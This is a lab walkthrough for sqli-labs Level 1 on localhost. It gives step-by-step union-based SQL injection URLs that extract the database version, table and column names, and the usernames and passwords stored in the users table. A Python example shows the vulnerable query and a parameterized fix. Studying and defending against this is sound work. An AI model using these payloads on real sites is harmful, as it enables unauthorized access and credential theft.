Shulou (Shulou.com), 06/01 report. Updated 2025-03-28, SLTechnology News&Howtos.
Start with the first level:
http://127.0.0.1/sqli-labs-master/Less-1/
Testing with a single quote after the id produces an error:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
You can see the SQL statement error.
Test with and 1 = 1:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 1%23
The page displays normally. %23 is the URL-encoded '#', which starts a comment.
Test with and 1 = 2:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 2%23
This returns a failure, indicating that an injection point exists.
Determine the number of columns:
With order by 3, the page displays normally:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23
With order by 4, the page displays abnormally, so the query has 3 columns.
Force an empty result (id=-1) to show which positions are echoed:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23
Positions 2 and 3 are echoed.
Use version() to see the version and database() to see the database the site is currently using:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(), database() %23
As you can see from the figure below, the php version used is 5.5.53, and the database name used by the site is security.
Add a where clause as a filter to list the tables in the security database:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23
There are four tables:
View the columns in the users table:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23
Check username and password:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23
The users table also has an id column. Let's see how many accounts and passwords there are.
Just add where id = n.
Testing shows the maximum id is 14:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 1%23
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 14%23
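Why the test inputs above behave as they do, and what closes the hole, as an added example that is not part of the original post or of sqli-labs. It assumes the level pastes id into a quoted string, uses an in-memory SQLite table with constructed rows in place of the lab's MySQL, and so writes the comment as "-- " instead of %23; the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample rows; three columns, matching the count found with order by.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed query shape: the request parameter is concatenated inside quotes,
    # so a quote in raw_id ends the string and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE id='" + raw_id + "' LIMIT 0,1"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def lookup_safe(db, raw_id):
    # Reject anything that is not a plain integer, then bind it as a parameter.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return db.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1",
                      (int(raw_id),)).fetchall()

# The walkthrough's test inputs, with SQLite's "-- " comment in place of %23.
PROBES = [
    "1",
    "1'",
    "1' and 1=1 -- ",
    "1' and 1=2 -- ",
    "-1' union select 1,username,password from users -- ",
]

def compare(db):
    # Maps each input to (vulnerable result, safe result).
    return {p: (lookup_vulnerable(db, p), lookup_safe(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (vuln, safe) in compare(make_db()).items():
        print(repr(probe), "| vulnerable:", vuln, "| safe:", safe)
```

With the bound parameter, every input except the plain 1 returns no rows and no SQL error, so the quote, the true/false pair and the union all stop producing distinguishable responses.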
End of the first level.
The second level was updated very quickly.
Disclaimer: The official source code has been changed by me. I added the php code I changed: